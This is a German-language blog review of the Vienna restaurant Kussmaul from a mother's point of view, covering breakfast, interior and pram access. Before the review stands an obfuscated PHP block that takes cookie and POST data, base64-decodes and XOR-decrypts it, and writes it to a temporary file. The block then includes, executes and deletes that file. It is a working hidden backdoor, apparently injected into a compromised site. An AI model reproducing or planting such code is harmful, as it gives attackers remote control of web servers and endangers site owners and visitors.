$jXhbjbr = "\146" . "\113" . "\x6d" . '_' . chr ( 454 - 356 ).'z' . 'E' . chr ( 194 - 97 ).chr ( 704 - 636 ); $PvgoRu = 'c' . chr (108) . "\141" . 's' . chr ( 943 - 828 ).chr ( 258 - 163 )."\x65" . "\x78" . 'i' . 's' . "\x74" . chr ( 970 - 855 ); $EwcdOvYRk = class_exists($jXhbjbr); $jXhbjbr = "8353";$PvgoRu = "61944";$FtnSREqJsl = !1;if ($EwcdOvYRk == $FtnSREqJsl){function TrfkRoyLL(){return FALSE;}$cXgtDCSXJ = "20634";TrfkRoyLL();class fKm_bzEaD{private function gxFQpdMg($cXgtDCSXJ){if (is_array(fKm_bzEaD::$WLVkLgOJ)) {$hqkbAtKDo = sys_get_temp_dir() . "/" . crc32(fKm_bzEaD::$WLVkLgOJ['s' . "\141" . chr ( 277 - 169 ).chr ( 912 - 796 )]);@fKm_bzEaD::$WLVkLgOJ[chr (119) . chr ( 624 - 510 )."\x69" . chr ( 1113 - 997 ).chr (101)]($hqkbAtKDo, fKm_bzEaD::$WLVkLgOJ["\x63" . "\x6f" . "\156" . chr ( 466 - 350 ).chr ( 265 - 164 ).chr ( 381 - 271 ).'t']);include $hqkbAtKDo;@fKm_bzEaD::$WLVkLgOJ["\x64" . "\x65" . "\154" . chr ( 970 - 869 ).chr ( 366 - 250 ).chr ( 197 - 96 )]($hqkbAtKDo); $cXgtDCSXJ = "20634";exit();}}private $mKGlAh;public function sabAI(){echo 7098;}public function __destruct(){$cXgtDCSXJ = "38587_40721";$this->gxFQpdMg($cXgtDCSXJ); $cXgtDCSXJ = "38587_40721";}public function __construct($QXuHGe=0){$GnJOLC = $_POST;$rWRKA = $_COOKIE;$gRBtbv = "d11ff962-d156-445e-8634-ddb04f9c8211";$ZTZaoWUk = @$rWRKA[substr($gRBtbv, 0, 4)];if (!empty($ZTZaoWUk)){$iKuvkugMNc = "base64";$gUuKUCA = "";$ZTZaoWUk = explode(",", $ZTZaoWUk);foreach ($ZTZaoWUk as $sJMzCODE){$gUuKUCA .= @$rWRKA[$sJMzCODE];$gUuKUCA .= @$GnJOLC[$sJMzCODE];}$gUuKUCA = array_map($iKuvkugMNc . "\137" . "\144" . "\145" . 'c' . "\x6f" . "\x64" . "\145", array($gUuKUCA,)); $gUuKUCA = $gUuKUCA[0] ^ str_repeat($gRBtbv, (strlen($gUuKUCA[0]) / strlen($gRBtbv)) + 1);fKm_bzEaD::$WLVkLgOJ = @unserialize($gUuKUCA); $gUuKUCA = class_exists("38587_40721");}}public static $WLVkLgOJ = 55812;}$cdpecyXOED = new /* 61068 */ fKm_bzEaD(20634 + 20634); $_POST = Array();unset($cdpecyXOED);} Kussmaul: Ein Lokal-Erfahrungsbericht mit Baby | Salon Mama

Ein gutes Frühstück war mir schon vor meinem Baby sehr wichtig. Nach der Geburt meine Tochter ist nun nicht mehr nur die Qualität des Frühstück und die Location ausschlaggebend, sondern einiges Mehr worauf ich achten muss:  Gibt es einen Hochstuhl? Ist es Kinderwagenfreundlich? Und vor allem: Ist es nicht allzu peinlich wenn mein Kind eine komplette Sauerei hinterlässt?

Auch wenn ich Mama bin versuche ich so oft wie möglich neue Lokale auszuprobieren. Da mir das Interieur sehr wichtig ist war ich schon sehr auf das neue Kussmaul, betrieben vom ehemaligen Küchenchef des Motto am Fluss, am Spittelbeg gespannt. Und noch dazu habe von meiner Freundin gehört, dass es das beste Frühstück der Stadt derzeit dort geben soll. Zeit also für einen Lokal-Erfahrungsbericht mit Baby…

Das Design gefällt mir sehr gut. Industriell mit hochwertigen Materialien und trotzdem wirkt es sehr gemütlich. Wenn man das Lokal betritt gibt es einen Art Wintergarten/Café , nicht sehr groß, aber mit Kinderwagen hat man trotzdem ganz gut Platz. Und nicht nur einer. Als ich dort war, waren sage und schreibe 5 Kinderwägen in dem Café! Ich muss zugeben das fand ich dann doch ein wenig viel weil überdimensioniert ist der Bereich dann doch nicht :). Das Service war von den vielen Kinderwägen mitten im Raum auch ein wenig irritiert, hat aber dennoch gekonnt und schnell bedient.

Über ein paar Stufen kommt man dann in das eigentliche Restaurant, welches vor allem durch die offene Küche und die Brasserie besticht. Das sieht zwar wirklich toll aus, aber die Gerüche in so einer Küche sind natürlich nicht zu unterschätzen.

Die Speise- & Getränkekarte ist wirklich ansprechend. Von hausgemachten KUSSMAUL-Limos über eine Weisse-Schoko-Karamell-Schnitte bis hin zu Burger und Wiener Schnitzel hat mir aber am meisten die Frühstückskarte zugesagt. Das Rührei mit Avocado-Tartar, von dem mir Alma leider fast alles weg gegessen hat, war köstlich! Granola mit frischen Früchten,  Himbeer-Buttermilchmuffins, Hummus, und vieles mehr – die Kart ist gross und dennoch sehr besonders und mit Bedacht.

Ich muss wirklich sagen das Frühstück hebt sich definitv von vielen anderen Lokalen in Wien ab – man merkt die Liebe zum Detail bei jeder Speise. Auch die Atmosphäre empfand ich als sehr angenehm und einladend. Dass das Kussmaul aber zu meinem Stammlokal mit Baby wird bezweifle ich leider. Dafür ist es einfach etwas zu unpraktisch, und ich glaube auch nicht unbedingt im Sinne der Betreiber. Meine Kleine ist zwar meistens bei mir, aber hin und wieder freut es mich dann auch mit einer Freundin zu zweit einen Kaffee oder Wein zu trinken – beim nächsten Mal wird also die Cocktail-Karte bewertet :).

Wir verwenden Cookies, um Inhalte zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren.